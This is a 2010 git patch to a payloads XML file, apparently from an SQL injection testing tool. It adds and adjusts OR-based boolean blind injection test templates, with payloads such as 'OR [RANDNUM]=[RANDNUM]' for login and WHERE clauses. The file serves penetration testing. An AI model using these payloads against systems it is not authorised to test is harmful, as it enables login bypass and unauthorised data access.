From 80666102176d55b6129c9c0e1eefcfa0b0700874 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 5 Dec 2010 10:55:19 +0000
Subject: [PATCH] Minor improvements to OR based injections

---
 xml/payloads.xml | 32 ++++++++++++++++++++++++--------
 1 file changed, 24 insertions(+), 8 deletions(-)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index 673936d8c..f34e2a2cd 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -411,9 +411,25 @@ Formats:
     </test>
 
     <test>
+       <title>OR boolean-based blind - WHERE clause (login)</title>
+       <stype>1</stype>
+       <level>2</level>
+       <risk>3</risk>
+       <clause>1</clause>
+       <where>1</where>
+       <request>
+           <payload>OR [RANDNUM]=[RANDNUM]</payload>
+           <comment>#</comment>
+       </request>
+       <response>
+           <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+       </response>
+   </test>
+
+   <test>
         <title>OR boolean-based blind - WHERE clause</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>3</risk>
         <clause>1</clause>
         <where>2</where>
@@ -428,16 +444,16 @@ Formats:
     <test>
         <title>OR boolean-based blind - WHERE clause</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>3</risk>
         <clause>1</clause>
-        <where>1</where>
+        <where>2</where>
         <request>
-            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <payload>OR [RANDNUM]=[RANDNUM1]</payload>
             <comment>#</comment>
         </request>
         <response>
-            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+            <comparison>OR [RANDNUM]=[RANDNUM]</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -450,13 +466,13 @@ Formats:
         <level>3</level>
         <risk>3</risk>
         <clause>1</clause>
-        <where>1</where>
+        <where>2</where>
         <request>
-            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <payload>OR [RANDNUM]=[RANDNUM1]</payload>
             <comment>--</comment>
         </request>
         <response>
-            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+            <comparison>OR [RANDNUM]=[RANDNUM]</comparison>
         </response>
     </test>
     <!-- End of boolean-based blind tests - WHERE clause -->